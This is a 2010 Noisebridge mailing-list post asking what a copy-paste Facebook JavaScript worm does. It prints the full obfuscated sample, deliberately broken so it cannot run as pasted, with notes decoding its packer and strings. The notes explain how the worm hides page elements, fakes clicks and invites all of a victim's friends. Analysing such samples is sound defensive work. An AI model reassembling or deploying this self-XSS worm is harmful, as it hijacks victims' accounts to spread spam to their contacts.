[Noisebridge-discuss] What does this Facebook javascript malware do?

Lee Sonko lee at lee.org
Fri May 7 18:11:41 UTC 2010


A friend received this Facebook malware. It told her to copy and paste the
malware below into her browser. She did :-(

She tells me that it then pulled up a Facebook page and invited all her
Facebook friends to the malware page.

 

Can you, the JavaScript-enabled hacker, tell what it does? I'm guessing the
RegExp runs a substitution cipher on that long string of characters, but I'm
lost from there.

 

I've been watching the number of "People Like This" on the page grow from
1,000 to 1,500 in the past 20 minutes.  

 

 

 

 

http://www.face

CAUTION DON'T FOLLOW THE INSTRUCTIONS ON THIS PAGE

book.com/pages/shhh-its-the-new-secret-profile-page-click-here/1187939614746
52

 

 

 

// ANALYSIS NOTES (added for readers; the sample below is unchanged).
//
// Form: a `javascript:` URL wrapping an immediately-invoked function. Pasted
// into the address bar it runs with the privileges of whatever page is open,
// i.e. inside the victim's logged-in session -- commonly called "self-XSS".
// The "MALWARE DON'T RUN" line splitting the word `function` was apparently
// inserted by the poster so the text cannot be executed as pasted; the other
// mid-token breaks are e-mail line wrapping.
//
// Stage 1 (plain text): five variables are set to element ids that share the
// prefix `app117185681648577_`.
//
// Stage 2 (packer): `eval(function(p,a,c,k,e,r){...})` is a dictionary packer.
// `e` renders an index as a base-62 token (a = 62), the '|'-separated list is
// the 69-entry dictionary (c = 69), and each `\b<token>\b` in the payload `p`
// is replaced by its dictionary word before the result is handed to `eval`.
// To unpack for analysis, print the returned string instead of evaluating it,
// in an environment with no browser session attached.
//
// Stage 3 (string table): after substitution the payload declares an array
// `_0x95ea` whose entries are \xNN hex escapes. Decoded, they are:
// visibility, style, getElementById, hidden, innerHTML, value, suggest,
// likeme, MouseEvents, createEvent, click, initEvent, dispatchEvent,
// select_all, sgm_invite_form, /ajax/social_graph/invite_dialog.php,
// submitDialog.
//
// Behaviour of the unpacked code, read from the payload:
//   - sets style.visibility = "hidden" on the element whose id is in `cWsFYs`;
//   - copies the `value` of element `b` into the `innerHTML` of element `a`;
//   - builds a synthetic MouseEvents "click" and dispatches it on the element
//     with id "suggest";
//   - three timers of 5000 ms each then call `fs.select_all()`, call
//     `SocialGraphManager.submitDialog("sgm_invite_form",
//     "/ajax/social_graph/invite_dialog.php")`, and dispatch the same click on
//     the element with id "likeme" while copying the `value` of element
//     `djzaef` into the `innerHTML` of element `wNPOwN`.
// `fs` and `SocialGraphManager` are not defined in this snippet; presumably
// they are objects supplied by the host page -- confirm against a page capture.
//
// Net effect: the script drives the page's own suggest/invite and like
// controls on the user's behalf, which matches the reported symptom of every
// friend being invited. Nothing visible here reads cookies or sends data to a
// third-party host; the harm is propagation through the victim's account.
javascript:(fun

MALWARE DON'T RUN

ction(){a='app117185681648577_TPCCax';b='app117185681648577_YbDOrx';djzaef='
app117185681648577_djzaef';wNPOwN='app117185681648577_wNPOwN';cWsFYs='app117
185681648577_cWsFYs';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':
e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(
!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return
r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new
RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J
e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r
\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\
\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\
f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","
\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\
\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r",
"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f
\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d
=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e
[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W
[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e
[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73
|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeou
t|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44
|document|cWsFYs|fs|SocialGraphManager|wNPOwN|djzaef|||||||'.split('|'),0,{}
))})();        
